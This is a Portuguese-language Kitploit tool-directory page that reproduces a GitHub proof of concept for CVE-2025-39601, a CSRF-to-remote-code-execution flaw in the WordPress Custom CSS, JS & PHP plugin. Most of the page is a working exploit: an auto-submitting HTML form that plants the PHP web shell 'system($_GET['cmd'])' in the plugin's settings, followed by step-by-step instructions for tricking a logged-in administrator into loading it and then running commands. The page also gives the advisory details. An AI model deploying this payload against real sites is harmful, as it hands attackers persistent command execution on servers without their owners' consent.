Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-39601 — WordPress Custom CSS, JS & PHP plugin <= 2.4.1 - Vulnerabilidade de CSRF para RCE | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2025-39601
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebCTFTestes de PenetraçãoAprendizado e Educação
GitHubnxploited/cve-2025-39601

CVE-2025-39601

WordPress Custom CSS, JS & PHP plugin <= 2.4.1 - Vulnerabilidade de CSRF para RCE

Ver Repositório
15há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🚨 CVE-2025-39601 - CSRF para RCE no plugin WordPress Custom CSS, JS & PHP <= 2.4.1

🧠 Descrição

Uma vulnerabilidade de Cross-Site Request Forgery (CSRF) no plugin WPFactory Custom CSS, JS & PHP permite Execução Remota de Código (RCE) através da injeção de código PHP malicioso por meio de requisições POST não autorizadas.
Isso afeta todas as versões até e incluindo a 2.4.1.

  • CVE ID: CVE-2025-39601
  • Publicado: 2025-04-16
  • Atualizado: 2025-04-16
  • Severidade: 🔥 9.6 (CRÍTICO)
  • CWE: CWE-352 - Falsificação de Solicitação entre Sites
  • Vetor CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

🖼️ Prova Visual

Abaixo está uma captura de tela mostrando o resultado de uma exploração bem-sucedida, demonstrando como o código remoto pode ser executado através do parâmetro de URL:

Nxploited


Nxploited


💥 Prova de Conceito (PoC)

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>WordPress Custom CSS, JS & PHP plugin <= 2.4.1 - CSRF to RCE vulnerability</title>
</head>
<body onload="document.forms[0].submit()">
    <h1>CSRF PoC - WordPress Custom CSS, JS & PHP plugin <= 2.4.1</h1>
    <p>By : Nxploited | Khaled Alenazi</p>
    <form action="http://192.168.100.74:888/wordpress4/wp-admin/tools.php?page=alg-custom-php" method="POST">
        <input type="hidden" name="alg_custom_css_php_enabled" value="1">
        <input type="hidden" name="alg_custom_css_php_execute" value="plugins_loaded">
        <input type="hidden" name="alg_custom_css_php" value="<?php system($_GET['cmd']); ?>">
        <input type="hidden" name="alg_ccjp_submit" value="php">
        <noscript><input type="submit" value="Submit"></noscript>
    </form>
</body>
</html>

🧪 Uso

  1. Hospede o arquivo HTML acima em qualquer servidor externo ou ambiente local.
  2. Enquanto um usuário administrador estiver logado, visite o arquivo HTML hospedado no navegador dele.
  3. Isso enviará silenciosamente o formulário e injetará código PHP nas configurações do plugin.
  4. O código será executado automaticamente a cada carregamento de página através do hook plugins_loaded.
  5. Exemplo de execução:
    root@kitploit:~
    http://target-site.com/?cmd=whoami
    

⚠️ Aviso Legal

Esta PoC é apenas para fins educacionais.
O autor não se responsabiliza por qualquer uso indevido ou dano causado pela aplicação inadequada desta informação.
Sempre teste em ambientes controlados e com permissão.


By: Nxploited | Khaled Alenazi

Baixar ferramenta